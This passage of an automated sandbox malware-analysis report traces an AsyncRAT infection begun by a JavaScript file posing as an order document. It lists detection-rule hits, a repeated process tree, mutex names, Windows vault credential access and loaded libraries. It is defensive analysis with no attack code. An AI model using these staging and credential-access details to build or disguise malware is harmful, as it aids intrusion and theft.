              Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: GeUT.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Service.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: GeUT.exe.3.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: Service.exe.4.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winJS@52/22@0/2
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].jsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMutant created: NULL
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OLWJMU.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: tmp5FA4.tmp.dat.5.dr, tmp4638.tmp.dat.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ORDER-24930-067548.jsVirustotal: Detection: 30%
              Source: ORDER-24930-067548.jsReversingLabs: Detection: 26%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
